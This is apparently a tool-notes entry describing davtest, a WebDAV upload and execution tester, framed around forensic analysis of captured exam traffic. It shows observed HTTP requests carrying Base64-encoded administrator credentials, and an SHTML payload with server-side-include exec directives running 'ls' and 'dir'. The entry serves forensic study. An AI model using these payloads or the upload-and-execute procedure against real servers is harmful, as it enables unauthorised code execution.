ToolsFebruary 9, 20262 min readby 0xt0pus

DAVTest

WebDAV exploitation testing tool for checking upload capabilities and file execution

#webdav#web#exploitation

davtest

Description

davtest is a WebDAV exploitation testing tool that tests WebDAV-enabled servers by uploading test files of various types to determine which file extensions are accepted and executable. It uses the DAV.pm library (User-Agent: DAV.pm/v0.49) to interact with WebDAV servers and creates test directories and files to identify exploitable configurations.

Usage 1: Test WebDAV File Upload Capabilities

davtest automatically creates a test directory on the WebDAV server (e.g., DavTestDir_) and uploads files with various extensions to test which are accepted and executable.

Observed HTTP Request (MKCOL - Create Directory):

MKCOL /webdav/DavTestDir_GRgDKIdLKVtIGeL/ HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Authorization: Basic QWRtaW5pc3RyYXRvcjpQQHNzdzByZCE=
Host: www.mindtech.net:80
User-Agent: DAV.pm/v0.49
Content-Length: 0

Usage 2: Upload and Test ASPX Execution

davtest uploads test files (e.g., .aspx) and then requests them via GET to verify if the server executes them. A successful 200 OK response with dynamic content confirms code execution.

Observed HTTP Request (GET - Verify Execution):

GET /webdav/DavTestDir_GRgDKIdLKVtIGeL/davtest_GRgDKIdLKVtIGeL.aspx HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Authorization: Basic QWRtaW5pc3RyYXRvcjpQQHNzdzByZCE=
Host: www.mindtech.net:80
User-Agent: DAV.pm/v0.49
Content-Length: 0

Successful Execution Response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET

Usage 3: Upload and Test SHTML Server-Side Includes

davtest also tests SHTML files with Server-Side Include (SSI) directives to check for command execution via SSI.

Observed HTTP Request (PUT - Upload SHTML):

PUT /webdav/davtest_JdeStExYFBGs.shtml HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Authorization: Basic QWRtaW5pc3RyYXRvcjpQQHNzdzByZCE=
Host: www.mindtech.net:80
User-Agent: DAV.pm/v0.49
Content-Length: 181

SHTML Payload Content:

<!--#config timefmt="%Y" -->YEAR:<!--#flastmod file="davtest_JdeStExYFBGs.shtml"-->:YEAR
EXEC ls:<!--#exec cmd="ls -al"-->:EXEC ls
EXEC dir:<!--#exec cmd="dir"-->:EXEC dir

Basic Command Usage

davtest -url http://target/webdav -auth user:password

Notes

  • davtest identifies as User-Agent: DAV.pm/v0.49 in HTTP requests
  • Uses Basic authentication (Base64 encoded credentials in Authorization header)
  • Automatically generates random directory and file names (e.g., DavTestDir_GRgDKIdLKVtIGeL)
  • Tests multiple file types: aspx, shtml, php, jsp, txt, html, etc.
  • HTTP 201 Created response indicates successful file upload
  • Commonly used against Microsoft IIS/10.0 servers with WebDAV enabled
  • In the CCD Network Forensics exam, davtest traffic was analyzed to identify attacker activity against a WebDAV server (www.mindtech.net)